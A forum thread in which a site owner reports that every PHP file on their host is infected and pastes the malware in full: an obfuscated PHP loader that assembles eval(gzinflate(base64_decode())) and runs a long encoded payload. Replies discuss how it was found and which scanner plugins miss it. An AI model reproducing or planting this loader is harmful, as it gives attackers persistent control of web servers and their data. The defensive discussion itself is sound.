Mallware Alert

I am unlucky because all the php files in my public_html are infected with the following code:

<?php
$md5 = "59f063d5d1a6b701de0b7628b708f1dd";
$a5 = array("v",";","t",'n',"e",'6',"(",'b','i','c','$','_',"r",'d','l','g',"f",")","o","4","a",'z',"s");
$b50 = create_function('$'.'v',$a5[4].$a5[0].$a5[20].$a5[14].$a5[6].$a5[15].$a5[21].$a5[8].$a5[3].$a5[16].$a5[14].$a5[20].$a5[2].$a5[4].$a5[6].$a5[7].$a5[20].$a5[22].$a5[4].$a5[5].$a5[19].$a5[11].$a5[13].$a5[4].$a5[9].$a5[18].$a5[13].$a5[4].$a5[6].$a5[10].$a5[0].$a5[17].$a5[17].$a5[17].$a5[1]);
$b50('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');
?>

PHP:

Now I found some articles about this code.
http://stackoverflow.com/questions/7307970/cleanup-php-files-from-virus
http://www.php-beginners.com/solve-wordpress-malware-script-attack-fix.html


EDIT:
If You have mallware on your web hosting and want to remove it please contactme by writing a mail here
Thanks

 

How did you discover that you had the virus? Was your site acting up? I'm curious, so I know what to look for, how to tell if I have it.

 

I haven't had to remove any malware, yet but this plugin will look for it and it claims to remove the bad code from files where it finds it.
Anti-Malware

 

So I was making a new design a new theme wich is my and I saw the code in my theme wich is made by me.and than I got it.The code wich I gave sends information from my server to the hackers and enough.I liked the article on
http://www.php-beginners.com/solve-wordpress-malware-script-attack-fix.html

All wordpress sites when are new this is the first plugin wich I install but nothing.Would be nice to delete the code with one command on ssh.Anyway the best solution is the article wich I said above on the php-beginners.com

 

Robin for curiosity I reused the plugin wich you said and please look the attached screenshot
So the directory is full with that code but this plugin finds only 0 results
If you open this article you will see the list of mallware iframes,javascripts and the same code like my but I think that this plugin doesnt have this virus in database

 

Thx for the info, AlbCoder!

Re the plugin not finding the malicious code, is it because the hackers are able to make the code "invisible" to the plugin?

 

Try posting your results here: http://wordpress.org/support/plugin/gotmls
Eli (the plugin author) really cares and responds quickly.

 

I cleaned up my host without the plugin.